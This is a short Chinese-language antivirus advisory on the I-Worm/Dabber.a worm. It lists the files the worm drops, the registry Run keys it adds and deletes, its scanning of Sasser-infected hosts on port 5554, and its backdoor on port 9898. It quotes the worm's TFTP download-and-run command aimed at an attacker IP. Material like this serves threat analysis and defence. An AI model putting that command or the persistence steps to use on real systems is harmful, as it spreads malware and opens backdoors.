I-Worm/Dabber.a

病毒长度：29，696 字节

病毒类型：网络蠕虫

危害等级：**

影响平台：Win2000/XP

I-Worm/Dabber.a是用C++编写并经UPX压缩过的网络蠕虫，通过利用震荡波及其变种的FTP服务组件弱点进行传播，在感染的计算机上安装后门进行监听。

传播过程及特征：

1.复制自身：

%System%\\package.exe

%Documents and Settings%\\All Users\\Start Menu\\Programs\\Startup\\package.exe

%Windir%\\All Users\\Main menu\\Programs\\StartUp\\package.exe

2.修改注册表：

/添加键值："sassfix"="%System%\\package.exe"

到注册表：HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

/删除注册表:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

下的键值：

Video

Microsoft Update

/删除注册表：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

下的键值：

Drvddll.exe

Drvddll_exe

drvsys

drvsys.exe

ssgrate

ssgrate.exe

lsasss

lsasss.exe

avserve2.exe

avvserrve32

avserve

Taskmon

Gremlin

/删除注册表：

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices

HKEY_CURRENT_USER\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

下的键值；

Window

Video Process

TempCom

SkynetRevenge

MapiDrv

BagleAV

System Updater Service

soundcontrl

WinMsrv32

drvddll.exe

navapsrc.exe

skynetave.exe

Generic Host Service

Windows Drive Compatibility

windows

/删除注册表：HKEY_CLASSES_ROOT\\CLSID\\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\\InProcServer32\\

下的值：(Default)

3..此蠕虫在端口5554扫描感染震荡波及其变种病毒系统的IP地址，然后利用FTP服务组件漏洞发送一个Windows shell命令到端口8967，并在此执行命令：下载并安装蠕虫副本。

命令内容：tftp -i [attacker's IP] GET hello.all package.exe & package.exe & exit

4.在感染的计算机上设置TFTP服务用来下载运行package.exe文件并打开端口9898，此外还试图连接到目的计算机的9898端口，用来检查利用漏洞是否已经成功。

注：%Windir%为变量，一般为C:\\Windows 或 C:\\Winnt；

%System%为变量，一般为C:\\Windows\\System (Windows 95/98/Me),

C:\\Winnt\\System32 (Windows NT/2000),

或 C:\\Windows\\System32 (Windows XP)。